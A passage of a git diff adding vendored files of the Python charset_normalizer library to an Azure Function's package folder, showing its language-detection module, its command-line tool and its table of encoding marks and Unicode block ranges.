"த", + "ப", + "ட", + "ர", + "ம", + "ல", + "ன", + "வ", + "ற", + "ய", + "ள", + "ச", + "ந", + "இ", + "ண", + "அ", + "ஆ", + "ழ", + "ங", + "எ", + "உ", + "ஒ", + "ஸ", + ], + "Classical Chinese": [ + "之", + "年", + "為", + "也", + "以", + "一", + "人", + "其", + "者", + "國", + "有", + "二", + "十", + "於", + "曰", + "三", + "不", + "大", + "而", + "子", + "中", + "五", + "四", + ], + "Kazakh": [ + "а", + "ы", + "е", + "н", + "т", + "р", + "л", + "і", + "д", + "с", + "м", + "қ", + "к", + "о", + "б", + "и", + "у", + "ғ", + "ж", + "ң", + "з", + "ш", + "й", + "п", + "г", + "ө", + ], +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..04aeea0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/assets/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cd.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cd.py new file mode 100644 index 0000000..36bb43a --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cd.py @@ -0,0 +1,337 @@ +import importlib +from codecs import IncrementalDecoder +from collections import Counter +from functools import lru_cache +from typing import Dict, List, Optional, Tuple + +from .assets import FREQUENCIES +from .constant import KO_NAMES, LANGUAGE_SUPPORTED_COUNT, TOO_SMALL_SEQUENCE, ZH_NAMES +from .md import is_suspiciously_successive_range +from .models import CoherenceMatches +from .utils import ( + is_accentuated, + is_latin, + is_multi_byte_encoding, + is_unicode_range_secondary, + unicode_range, +) + + +def encoding_unicode_range(iana_name: str) -> List[str]: + """ + Return associated unicode ranges in a single byte code page. + """ + if is_multi_byte_encoding(iana_name): + raise IOError("Function not supported on multi-byte code page") + + decoder = importlib.import_module("encodings.{}".format(iana_name)).IncrementalDecoder # type: ignore + + p: IncrementalDecoder = decoder(errors="ignore") + seen_ranges: Dict[str, int] = {} + character_count: int = 0 + + for i in range(0x40, 0xFF): + chunk: str = p.decode(bytes([i])) + + if chunk: + character_range: Optional[str] = unicode_range(chunk) + + if character_range is None: + continue + + if is_unicode_range_secondary(character_range) is False: + if character_range not in seen_ranges: + seen_ranges[character_range] = 0 + seen_ranges[character_range] += 1 + character_count += 1 + + return sorted( + [ + character_range + for character_range in seen_ranges + if seen_ranges[character_range] / character_count >= 0.15 + ] + ) + + +def unicode_range_languages(primary_range: str) -> List[str]: + """ + Return inferred languages used with a unicode range. + """ + languages: List[str] = [] + + for language, characters in FREQUENCIES.items(): + for character in characters: + if unicode_range(character) == primary_range: + languages.append(language) + break + + return languages + + +@lru_cache() +def encoding_languages(iana_name: str) -> List[str]: + """ + Single-byte encoding language association. Some code page are heavily linked to particular language(s). + This function does the correspondence. + """ + unicode_ranges: List[str] = encoding_unicode_range(iana_name) + primary_range: Optional[str] = None + + for specified_range in unicode_ranges: + if "Latin" not in specified_range: + primary_range = specified_range + break + + if primary_range is None: + return ["Latin Based"] + + return unicode_range_languages(primary_range) + + +@lru_cache() +def mb_encoding_languages(iana_name: str) -> List[str]: + """ + Multi-byte encoding language association. Some code page are heavily linked to particular language(s). + This function does the correspondence. + """ + if ( + iana_name.startswith("shift_") + or iana_name.startswith("iso2022_jp") + or iana_name.startswith("euc_j") + or iana_name == "cp932" + ): + return ["Japanese"] + if iana_name.startswith("gb") or iana_name in ZH_NAMES: + return ["Chinese", "Classical Chinese"] + if iana_name.startswith("iso2022_kr") or iana_name in KO_NAMES: + return ["Korean"] + + return [] + + +@lru_cache(maxsize=LANGUAGE_SUPPORTED_COUNT) +def get_target_features(language: str) -> Tuple[bool, bool]: + """ + Determine main aspects from a supported language if it contains accents and if is pure Latin. 
+ """ + target_have_accents: bool = False + target_pure_latin: bool = True + + for character in FREQUENCIES[language]: + if not target_have_accents and is_accentuated(character): + target_have_accents = True + if target_pure_latin and is_latin(character) is False: + target_pure_latin = False + + return target_have_accents, target_pure_latin + + +def alphabet_languages( + characters: List[str], ignore_non_latin: bool = False +) -> List[str]: + """ + Return associated languages associated to given characters. + """ + languages: List[Tuple[str, float]] = [] + + source_have_accents = any(is_accentuated(character) for character in characters) + + for language, language_characters in FREQUENCIES.items(): + + target_have_accents, target_pure_latin = get_target_features(language) + + if ignore_non_latin and target_pure_latin is False: + continue + + if target_have_accents is False and source_have_accents: + continue + + character_count: int = len(language_characters) + + character_match_count: int = len( + [c for c in language_characters if c in characters] + ) + + ratio: float = character_match_count / character_count + + if ratio >= 0.2: + languages.append((language, ratio)) + + languages = sorted(languages, key=lambda x: x[1], reverse=True) + + return [compatible_language[0] for compatible_language in languages] + + +def characters_popularity_compare( + language: str, ordered_characters: List[str] +) -> float: + """ + Determine if a ordered characters list (by occurrence from most appearance to rarest) match a particular language. + The result is a ratio between 0. (absolutely no correspondence) and 1. (near perfect fit). + Beware that is function is not strict on the match in order to ease the detection. (Meaning close match is 1.) + """ + if language not in FREQUENCIES: + raise ValueError("{} not available".format(language)) + + character_approved_count: int = 0 + FREQUENCIES_language_set = set(FREQUENCIES[language]) + + for character in ordered_characters: + if character not in FREQUENCIES_language_set: + continue + + characters_before_source: List[str] = FREQUENCIES[language][ + 0 : FREQUENCIES[language].index(character) + ] + characters_after_source: List[str] = FREQUENCIES[language][ + FREQUENCIES[language].index(character) : + ] + characters_before: List[str] = ordered_characters[ + 0 : ordered_characters.index(character) + ] + characters_after: List[str] = ordered_characters[ + ordered_characters.index(character) : + ] + + before_match_count: int = len( + set(characters_before) & set(characters_before_source) + ) + + after_match_count: int = len( + set(characters_after) & set(characters_after_source) + ) + + if len(characters_before_source) == 0 and before_match_count <= 4: + character_approved_count += 1 + continue + + if len(characters_after_source) == 0 and after_match_count <= 4: + character_approved_count += 1 + continue + + if ( + before_match_count / len(characters_before_source) >= 0.4 + or after_match_count / len(characters_after_source) >= 0.4 + ): + character_approved_count += 1 + continue + + return character_approved_count / len(ordered_characters) + + +def alpha_unicode_split(decoded_sequence: str) -> List[str]: + """ + Given a decoded text sequence, return a list of str. Unicode range / alphabet separation. + Ex. a text containing English/Latin with a bit a Hebrew will return two items in the resulting list; + One containing the latin letters and the other hebrew. 
+ """ + layers: Dict[str, str] = {} + + for character in decoded_sequence: + if character.isalpha() is False: + continue + + character_range: Optional[str] = unicode_range(character) + + if character_range is None: + continue + + layer_target_range: Optional[str] = None + + for discovered_range in layers: + if ( + is_suspiciously_successive_range(discovered_range, character_range) + is False + ): + layer_target_range = discovered_range + break + + if layer_target_range is None: + layer_target_range = character_range + + if layer_target_range not in layers: + layers[layer_target_range] = character.lower() + continue + + layers[layer_target_range] += character.lower() + + return list(layers.values()) + + +def merge_coherence_ratios(results: List[CoherenceMatches]) -> CoherenceMatches: + """ + This function merge results previously given by the function coherence_ratio. + The return type is the same as coherence_ratio. + """ + per_language_ratios: Dict[str, List[float]] = {} + for result in results: + for sub_result in result: + language, ratio = sub_result + if language not in per_language_ratios: + per_language_ratios[language] = [ratio] + continue + per_language_ratios[language].append(ratio) + + merge = [ + ( + language, + round( + sum(per_language_ratios[language]) / len(per_language_ratios[language]), + 4, + ), + ) + for language in per_language_ratios + ] + + return sorted(merge, key=lambda x: x[1], reverse=True) + + +@lru_cache(maxsize=2048) +def coherence_ratio( + decoded_sequence: str, threshold: float = 0.1, lg_inclusion: Optional[str] = None +) -> CoherenceMatches: + """ + Detect ANY language that can be identified in given sequence. The sequence will be analysed by layers. + A layer = Character extraction by alphabets/ranges. + """ + + results: List[Tuple[str, float]] = [] + ignore_non_latin: bool = False + + sufficient_match_count: int = 0 + + lg_inclusion_list = lg_inclusion.split(",") if lg_inclusion is not None else [] + if "Latin Based" in lg_inclusion_list: + ignore_non_latin = True + lg_inclusion_list.remove("Latin Based") + + for layer in alpha_unicode_split(decoded_sequence): + sequence_frequencies: Counter = Counter(layer) + most_common = sequence_frequencies.most_common() + + character_count: int = sum(o for c, o in most_common) + + if character_count <= TOO_SMALL_SEQUENCE: + continue + + popular_character_ordered: List[str] = [c for c, o in most_common] + + for language in lg_inclusion_list or alphabet_languages( + popular_character_ordered, ignore_non_latin + ): + ratio: float = characters_popularity_compare( + language, popular_character_ordered + ) + + if ratio < threshold: + continue + elif ratio >= 0.8: + sufficient_match_count += 1 + + results.append((language, round(ratio, 4))) + + if sufficient_match_count >= 3: + break + + return sorted(results, key=lambda x: x[1], reverse=True) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..dfbcca9 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc new file mode 100644 index 0000000..e538e3c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/__pycache__/normalizer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/normalizer.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/normalizer.py new file mode 100644 index 0000000..894c507 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/cli/normalizer.py @@ -0,0 +1,295 @@ +import argparse +import sys +from json import dumps +from os.path import abspath +from platform import python_version +from typing import List + +try: + from unicodedata2 import unidata_version +except ImportError: + from unicodedata import unidata_version + +from charset_normalizer import from_fp +from charset_normalizer.models import CliDetectionResult +from charset_normalizer.version import __version__ + + +def query_yes_no(question: str, default: str = "yes") -> bool: + """Ask a yes/no question via input() and return their answer. + + "question" is a string that is presented to the user. + "default" is the presumed answer if the user just hits . + It must be "yes" (the default), "no" or None (meaning + an answer is required of the user). + + The "answer" return value is True for "yes" or False for "no". + + Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input + """ + valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False} + if default is None: + prompt = " [y/n] " + elif default == "yes": + prompt = " [Y/n] " + elif default == "no": + prompt = " [y/N] " + else: + raise ValueError("invalid default answer: '%s'" % default) + + while True: + sys.stdout.write(question + prompt) + choice = input().lower() + if default is not None and choice == "": + return valid[default] + elif choice in valid: + return valid[choice] + else: + sys.stdout.write("Please respond with 'yes' or 'no' " "(or 'y' or 'n').\n") + + +def cli_detect(argv: List[str] = None) -> int: + """ + CLI assistant using ARGV and ArgumentParser + :param argv: + :return: 0 if everything is fine, anything else equal trouble + """ + parser = argparse.ArgumentParser( + description="The Real First Universal Charset Detector. " + "Discover originating encoding used on text file. " + "Normalize text to unicode." + ) + + parser.add_argument( + "files", type=argparse.FileType("rb"), nargs="+", help="File(s) to be analysed" + ) + parser.add_argument( + "-v", + "--verbose", + action="store_true", + default=False, + dest="verbose", + help="Display complementary information about file if any. " + "Stdout will contain logs about the detection process.", + ) + parser.add_argument( + "-a", + "--with-alternative", + action="store_true", + default=False, + dest="alternatives", + help="Output complementary possibilities if any. 
Top-level JSON WILL be a list.", + ) + parser.add_argument( + "-n", + "--normalize", + action="store_true", + default=False, + dest="normalize", + help="Permit to normalize input file. If not set, program does not write anything.", + ) + parser.add_argument( + "-m", + "--minimal", + action="store_true", + default=False, + dest="minimal", + help="Only output the charset detected to STDOUT. Disabling JSON output.", + ) + parser.add_argument( + "-r", + "--replace", + action="store_true", + default=False, + dest="replace", + help="Replace file when trying to normalize it instead of creating a new one.", + ) + parser.add_argument( + "-f", + "--force", + action="store_true", + default=False, + dest="force", + help="Replace file without asking if you are sure, use this flag with caution.", + ) + parser.add_argument( + "-t", + "--threshold", + action="store", + default=0.2, + type=float, + dest="threshold", + help="Define a custom maximum amount of chaos allowed in decoded content. 0. <= chaos <= 1.", + ) + parser.add_argument( + "--version", + action="version", + version="Charset-Normalizer {} - Python {} - Unicode {}".format( + __version__, python_version(), unidata_version + ), + help="Show version information and exit.", + ) + + args = parser.parse_args(argv) + + if args.replace is True and args.normalize is False: + print("Use --replace in addition of --normalize only.", file=sys.stderr) + return 1 + + if args.force is True and args.replace is False: + print("Use --force in addition of --replace only.", file=sys.stderr) + return 1 + + if args.threshold < 0.0 or args.threshold > 1.0: + print("--threshold VALUE should be between 0. AND 1.", file=sys.stderr) + return 1 + + x_ = [] + + for my_file in args.files: + + matches = from_fp(my_file, threshold=args.threshold, explain=args.verbose) + + best_guess = matches.best() + + if best_guess is None: + print( + 'Unable to identify originating encoding for "{}". {}'.format( + my_file.name, + "Maybe try increasing maximum amount of chaos." 
+ if args.threshold < 1.0 + else "", + ), + file=sys.stderr, + ) + x_.append( + CliDetectionResult( + abspath(my_file.name), + None, + [], + [], + "Unknown", + [], + False, + 1.0, + 0.0, + None, + True, + ) + ) + else: + x_.append( + CliDetectionResult( + abspath(my_file.name), + best_guess.encoding, + best_guess.encoding_aliases, + [ + cp + for cp in best_guess.could_be_from_charset + if cp != best_guess.encoding + ], + best_guess.language, + best_guess.alphabets, + best_guess.bom, + best_guess.percent_chaos, + best_guess.percent_coherence, + None, + True, + ) + ) + + if len(matches) > 1 and args.alternatives: + for el in matches: + if el != best_guess: + x_.append( + CliDetectionResult( + abspath(my_file.name), + el.encoding, + el.encoding_aliases, + [ + cp + for cp in el.could_be_from_charset + if cp != el.encoding + ], + el.language, + el.alphabets, + el.bom, + el.percent_chaos, + el.percent_coherence, + None, + False, + ) + ) + + if args.normalize is True: + + if best_guess.encoding.startswith("utf") is True: + print( + '"{}" file does not need to be normalized, as it already came from unicode.'.format( + my_file.name + ), + file=sys.stderr, + ) + if my_file.closed is False: + my_file.close() + continue + + o_: List[str] = my_file.name.split(".") + + if args.replace is False: + o_.insert(-1, best_guess.encoding) + if my_file.closed is False: + my_file.close() + elif ( + args.force is False + and query_yes_no( + 'Are you sure to normalize "{}" by replacing it ?'.format( + my_file.name + ), + "no", + ) + is False + ): + if my_file.closed is False: + my_file.close() + continue + + try: + x_[0].unicode_path = abspath("./{}".format(".".join(o_))) + + with open(x_[0].unicode_path, "w", encoding="utf-8") as fp: + fp.write(str(best_guess)) + except IOError as e: + print(str(e), file=sys.stderr) + if my_file.closed is False: + my_file.close() + return 2 + + if my_file.closed is False: + my_file.close() + + if args.minimal is False: + print( + dumps( + [el.__dict__ for el in x_] if len(x_) > 1 else x_[0].__dict__, + ensure_ascii=True, + indent=4, + ) + ) + else: + for my_file in args.files: + print( + ", ".join( + [ + el.encoding or "undefined" + for el in x_ + if el.path == abspath(my_file.name) + ] + ) + ) + + return 0 + + +if __name__ == "__main__": + cli_detect() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/constant.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/constant.py new file mode 100644 index 0000000..8daa3b6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/charset_normalizer/constant.py @@ -0,0 +1,497 @@ +from codecs import BOM_UTF8, BOM_UTF16_BE, BOM_UTF16_LE, BOM_UTF32_BE, BOM_UTF32_LE +from encodings.aliases import aliases +from re import IGNORECASE, compile as re_compile +from typing import Dict, List, Set, Union + +from .assets import FREQUENCIES + +# Contain for each eligible encoding a list of/item bytes SIG/BOM +ENCODING_MARKS: Dict[str, Union[bytes, List[bytes]]] = { + "utf_8": BOM_UTF8, + "utf_7": [ + b"\x2b\x2f\x76\x38", + b"\x2b\x2f\x76\x39", + b"\x2b\x2f\x76\x2b", + b"\x2b\x2f\x76\x2f", + b"\x2b\x2f\x76\x38\x2d", + ], + "gb18030": b"\x84\x31\x95\x33", + "utf_32": [BOM_UTF32_BE, BOM_UTF32_LE], + "utf_16": [BOM_UTF16_BE, BOM_UTF16_LE], +} + +TOO_SMALL_SEQUENCE: int = 32 +TOO_BIG_SEQUENCE: int = int(10e6) + +UTF8_MAXIMAL_ALLOCATION: int = 1112064 + +UNICODE_RANGES_COMBINED: Dict[str, range] = { 
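+ # Each entry maps an official Unicode block name to its inclusive code point
+ # range (built as range(start, end + 1) so the end code point is included);
+ # unicode_range() in utils.py walks this table linearly to classify a character.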
+ "Control character": range(31 + 1), + "Basic Latin": range(32, 127 + 1), + "Latin-1 Supplement": range(128, 255 + 1), + "Latin Extended-A": range(256, 383 + 1), + "Latin Extended-B": range(384, 591 + 1), + "IPA Extensions": range(592, 687 + 1), + "Spacing Modifier Letters": range(688, 767 + 1), + "Combining Diacritical Marks": range(768, 879 + 1), + "Greek and Coptic": range(880, 1023 + 1), + "Cyrillic": range(1024, 1279 + 1), + "Cyrillic Supplement": range(1280, 1327 + 1), + "Armenian": range(1328, 1423 + 1), + "Hebrew": range(1424, 1535 + 1), + "Arabic": range(1536, 1791 + 1), + "Syriac": range(1792, 1871 + 1), + "Arabic Supplement": range(1872, 1919 + 1), + "Thaana": range(1920, 1983 + 1), + "NKo": range(1984, 2047 + 1), + "Samaritan": range(2048, 2111 + 1), + "Mandaic": range(2112, 2143 + 1), + "Syriac Supplement": range(2144, 2159 + 1), + "Arabic Extended-A": range(2208, 2303 + 1), + "Devanagari": range(2304, 2431 + 1), + "Bengali": range(2432, 2559 + 1), + "Gurmukhi": range(2560, 2687 + 1), + "Gujarati": range(2688, 2815 + 1), + "Oriya": range(2816, 2943 + 1), + "Tamil": range(2944, 3071 + 1), + "Telugu": range(3072, 3199 + 1), + "Kannada": range(3200, 3327 + 1), + "Malayalam": range(3328, 3455 + 1), + "Sinhala": range(3456, 3583 + 1), + "Thai": range(3584, 3711 + 1), + "Lao": range(3712, 3839 + 1), + "Tibetan": range(3840, 4095 + 1), + "Myanmar": range(4096, 4255 + 1), + "Georgian": range(4256, 4351 + 1), + "Hangul Jamo": range(4352, 4607 + 1), + "Ethiopic": range(4608, 4991 + 1), + "Ethiopic Supplement": range(4992, 5023 + 1), + "Cherokee": range(5024, 5119 + 1), + "Unified Canadian Aboriginal Syllabics": range(5120, 5759 + 1), + "Ogham": range(5760, 5791 + 1), + "Runic": range(5792, 5887 + 1), + "Tagalog": range(5888, 5919 + 1), + "Hanunoo": range(5920, 5951 + 1), + "Buhid": range(5952, 5983 + 1), + "Tagbanwa": range(5984, 6015 + 1), + "Khmer": range(6016, 6143 + 1), + "Mongolian": range(6144, 6319 + 1), + "Unified Canadian Aboriginal Syllabics Extended": range(6320, 6399 + 1), + "Limbu": range(6400, 6479 + 1), + "Tai Le": range(6480, 6527 + 1), + "New Tai Lue": range(6528, 6623 + 1), + "Khmer Symbols": range(6624, 6655 + 1), + "Buginese": range(6656, 6687 + 1), + "Tai Tham": range(6688, 6831 + 1), + "Combining Diacritical Marks Extended": range(6832, 6911 + 1), + "Balinese": range(6912, 7039 + 1), + "Sundanese": range(7040, 7103 + 1), + "Batak": range(7104, 7167 + 1), + "Lepcha": range(7168, 7247 + 1), + "Ol Chiki": range(7248, 7295 + 1), + "Cyrillic Extended C": range(7296, 7311 + 1), + "Sundanese Supplement": range(7360, 7375 + 1), + "Vedic Extensions": range(7376, 7423 + 1), + "Phonetic Extensions": range(7424, 7551 + 1), + "Phonetic Extensions Supplement": range(7552, 7615 + 1), + "Combining Diacritical Marks Supplement": range(7616, 7679 + 1), + "Latin Extended Additional": range(7680, 7935 + 1), + "Greek Extended": range(7936, 8191 + 1), + "General Punctuation": range(8192, 8303 + 1), + "Superscripts and Subscripts": range(8304, 8351 + 1), + "Currency Symbols": range(8352, 8399 + 1), + "Combining Diacritical Marks for Symbols": range(8400, 8447 + 1), + "Letterlike Symbols": range(8448, 8527 + 1), + "Number Forms": range(8528, 8591 + 1), + "Arrows": range(8592, 8703 + 1), + "Mathematical Operators": range(8704, 8959 + 1), + "Miscellaneous Technical": range(8960, 9215 + 1), + "Control Pictures": range(9216, 9279 + 1), + "Optical Character Recognition": range(9280, 9311 + 1), + "Enclosed Alphanumerics": range(9312, 9471 + 1), + "Box Drawing": range(9472, 9599 + 1), + "Block 
Elements": range(9600, 9631 + 1), + "Geometric Shapes": range(9632, 9727 + 1), + "Miscellaneous Symbols": range(9728, 9983 + 1), + "Dingbats": range(9984, 10175 + 1), + "Miscellaneous Mathematical Symbols-A": range(10176, 10223 + 1), + "Supplemental Arrows-A": range(10224, 10239 + 1), + "Braille Patterns": range(10240, 10495 + 1), + "Supplemental Arrows-B": range(10496, 10623 + 1), + "Miscellaneous Mathematical Symbols-B": range(10624, 10751 + 1), + "Supplemental Mathematical Operators": range(10752, 11007 + 1), + "Miscellaneous Symbols and Arrows": range(11008, 11263 + 1), + "Glagolitic": range(11264, 11359 + 1), + "Latin Extended-C": range(11360, 11391 + 1), + "Coptic": range(11392, 11519 + 1), + "Georgian Supplement": range(11520, 11567 + 1), + "Tifinagh": range(11568, 11647 + 1), + "Ethiopic Extended": range(11648, 11743 + 1), + "Cyrillic Extended-A": range(11744, 11775 + 1), + "Supplemental Punctuation": range(11776, 11903 + 1), + "CJK Radicals Supplement": range(11904, 12031 + 1), + "Kangxi Radicals": range(12032, 12255 + 1), + "Ideographic Description Characters": range(12272, 12287 + 1), + "CJK Symbols and Punctuation": range(12288, 12351 + 1), + "Hiragana": range(12352, 12447 + 1), + "Katakana": range(12448, 12543 + 1), + "Bopomofo": range(12544, 12591 + 1), + "Hangul Compatibility Jamo": range(12592, 12687 + 1), + "Kanbun": range(12688, 12703 + 1), + "Bopomofo Extended": range(12704, 12735 + 1), + "CJK Strokes": range(12736, 12783 + 1), + "Katakana Phonetic Extensions": range(12784, 12799 + 1), + "Enclosed CJK Letters and Months": range(12800, 13055 + 1), + "CJK Compatibility": range(13056, 13311 + 1), + "CJK Unified Ideographs Extension A": range(13312, 19903 + 1), + "Yijing Hexagram Symbols": range(19904, 19967 + 1), + "CJK Unified Ideographs": range(19968, 40959 + 1), + "Yi Syllables": range(40960, 42127 + 1), + "Yi Radicals": range(42128, 42191 + 1), + "Lisu": range(42192, 42239 + 1), + "Vai": range(42240, 42559 + 1), + "Cyrillic Extended-B": range(42560, 42655 + 1), + "Bamum": range(42656, 42751 + 1), + "Modifier Tone Letters": range(42752, 42783 + 1), + "Latin Extended-D": range(42784, 43007 + 1), + "Syloti Nagri": range(43008, 43055 + 1), + "Common Indic Number Forms": range(43056, 43071 + 1), + "Phags-pa": range(43072, 43135 + 1), + "Saurashtra": range(43136, 43231 + 1), + "Devanagari Extended": range(43232, 43263 + 1), + "Kayah Li": range(43264, 43311 + 1), + "Rejang": range(43312, 43359 + 1), + "Hangul Jamo Extended-A": range(43360, 43391 + 1), + "Javanese": range(43392, 43487 + 1), + "Myanmar Extended-B": range(43488, 43519 + 1), + "Cham": range(43520, 43615 + 1), + "Myanmar Extended-A": range(43616, 43647 + 1), + "Tai Viet": range(43648, 43743 + 1), + "Meetei Mayek Extensions": range(43744, 43775 + 1), + "Ethiopic Extended-A": range(43776, 43823 + 1), + "Latin Extended-E": range(43824, 43887 + 1), + "Cherokee Supplement": range(43888, 43967 + 1), + "Meetei Mayek": range(43968, 44031 + 1), + "Hangul Syllables": range(44032, 55215 + 1), + "Hangul Jamo Extended-B": range(55216, 55295 + 1), + "High Surrogates": range(55296, 56191 + 1), + "High Private Use Surrogates": range(56192, 56319 + 1), + "Low Surrogates": range(56320, 57343 + 1), + "Private Use Area": range(57344, 63743 + 1), + "CJK Compatibility Ideographs": range(63744, 64255 + 1), + "Alphabetic Presentation Forms": range(64256, 64335 + 1), + "Arabic Presentation Forms-A": range(64336, 65023 + 1), + "Variation Selectors": range(65024, 65039 + 1), + "Vertical Forms": range(65040, 65055 + 1), + "Combining Half 
Marks": range(65056, 65071 + 1), + "CJK Compatibility Forms": range(65072, 65103 + 1), + "Small Form Variants": range(65104, 65135 + 1), + "Arabic Presentation Forms-B": range(65136, 65279 + 1), + "Halfwidth and Fullwidth Forms": range(65280, 65519 + 1), + "Specials": range(65520, 65535 + 1), + "Linear B Syllabary": range(65536, 65663 + 1), + "Linear B Ideograms": range(65664, 65791 + 1), + "Aegean Numbers": range(65792, 65855 + 1), + "Ancient Greek Numbers": range(65856, 65935 + 1), + "Ancient Symbols": range(65936, 65999 + 1), + "Phaistos Disc": range(66000, 66047 + 1), + "Lycian": range(66176, 66207 + 1), + "Carian": range(66208, 66271 + 1), + "Coptic Epact Numbers": range(66272, 66303 + 1), + "Old Italic": range(66304, 66351 + 1), + "Gothic": range(66352, 66383 + 1), + "Old Permic": range(66384, 66431 + 1), + "Ugaritic": range(66432, 66463 + 1), + "Old Persian": range(66464, 66527 + 1), + "Deseret": range(66560, 66639 + 1), + "Shavian": range(66640, 66687 + 1), + "Osmanya": range(66688, 66735 + 1), + "Osage": range(66736, 66815 + 1), + "Elbasan": range(66816, 66863 + 1), + "Caucasian Albanian": range(66864, 66927 + 1), + "Linear A": range(67072, 67455 + 1), + "Cypriot Syllabary": range(67584, 67647 + 1), + "Imperial Aramaic": range(67648, 67679 + 1), + "Palmyrene": range(67680, 67711 + 1), + "Nabataean": range(67712, 67759 + 1), + "Hatran": range(67808, 67839 + 1), + "Phoenician": range(67840, 67871 + 1), + "Lydian": range(67872, 67903 + 1), + "Meroitic Hieroglyphs": range(67968, 67999 + 1), + "Meroitic Cursive": range(68000, 68095 + 1), + "Kharoshthi": range(68096, 68191 + 1), + "Old South Arabian": range(68192, 68223 + 1), + "Old North Arabian": range(68224, 68255 + 1), + "Manichaean": range(68288, 68351 + 1), + "Avestan": range(68352, 68415 + 1), + "Inscriptional Parthian": range(68416, 68447 + 1), + "Inscriptional Pahlavi": range(68448, 68479 + 1), + "Psalter Pahlavi": range(68480, 68527 + 1), + "Old Turkic": range(68608, 68687 + 1), + "Old Hungarian": range(68736, 68863 + 1), + "Rumi Numeral Symbols": range(69216, 69247 + 1), + "Brahmi": range(69632, 69759 + 1), + "Kaithi": range(69760, 69839 + 1), + "Sora Sompeng": range(69840, 69887 + 1), + "Chakma": range(69888, 69967 + 1), + "Mahajani": range(69968, 70015 + 1), + "Sharada": range(70016, 70111 + 1), + "Sinhala Archaic Numbers": range(70112, 70143 + 1), + "Khojki": range(70144, 70223 + 1), + "Multani": range(70272, 70319 + 1), + "Khudawadi": range(70320, 70399 + 1), + "Grantha": range(70400, 70527 + 1), + "Newa": range(70656, 70783 + 1), + "Tirhuta": range(70784, 70879 + 1), + "Siddham": range(71040, 71167 + 1), + "Modi": range(71168, 71263 + 1), + "Mongolian Supplement": range(71264, 71295 + 1), + "Takri": range(71296, 71375 + 1), + "Ahom": range(71424, 71487 + 1), + "Warang Citi": range(71840, 71935 + 1), + "Zanabazar Square": range(72192, 72271 + 1), + "Soyombo": range(72272, 72367 + 1), + "Pau Cin Hau": range(72384, 72447 + 1), + "Bhaiksuki": range(72704, 72815 + 1), + "Marchen": range(72816, 72895 + 1), + "Masaram Gondi": range(72960, 73055 + 1), + "Cuneiform": range(73728, 74751 + 1), + "Cuneiform Numbers and Punctuation": range(74752, 74879 + 1), + "Early Dynastic Cuneiform": range(74880, 75087 + 1), + "Egyptian Hieroglyphs": range(77824, 78895 + 1), + "Anatolian Hieroglyphs": range(82944, 83583 + 1), + "Bamum Supplement": range(92160, 92735 + 1), + "Mro": range(92736, 92783 + 1), + "Bassa Vah": range(92880, 92927 + 1), + "Pahawh Hmong": range(92928, 93071 + 1), + "Miao": range(93952, 94111 + 1), + "Ideographic Symbols 
and Punctuation": range(94176, 94207 + 1), + "Tangut": range(94208, 100351 + 1), + "Tangut Components": range(100352, 101119 + 1), + "Kana Supplement": range(110592, 110847 + 1), + "Kana Extended-A": range(110848, 110895 + 1), + "Nushu": range(110960, 111359 + 1), + "Duployan": range(113664, 113823 + 1), + "Shorthand Format Controls": range(113824, 113839 + 1), + "Byzantine Musical Symbols": range(118784, 119039 + 1), + "Musical Symbols": range(119040, 119295 + 1), + "Ancient Greek Musical Notation": range(119296, 119375 + 1), + "Tai Xuan Jing Symbols": range(119552, 119647 + 1), + "Counting Rod Numerals": range(119648, 119679 + 1), + "Mathematical Alphanumeric Symbols": range(119808, 120831 + 1), + "Sutton SignWriting": range(120832, 121519 + 1), + "Glagolitic Supplement": range(122880, 122927 + 1), + "Mende Kikakui": range(124928, 125151 + 1), + "Adlam": range(125184, 125279 + 1), + "Arabic Mathematical Alphabetic Symbols": range(126464, 126719 + 1), + "Mahjong Tiles": range(126976, 127023 + 1), + "Domino Tiles": range(127024, 127135 + 1), + "Playing Cards": range(127136, 127231 + 1), + "Enclosed Alphanumeric Supplement": range(127232, 127487 + 1), + "Enclosed Ideographic Supplement": range(127488, 127743 + 1), + "Miscellaneous Symbols and Pictographs": range(127744, 128511 + 1), + "Emoticons range(Emoji)": range(128512, 128591 + 1), + "Ornamental Dingbats": range(128592, 128639 + 1), + "Transport and Map Symbols": range(128640, 128767 + 1), + "Alchemical Symbols": range(128768, 128895 + 1), + "Geometric Shapes Extended": 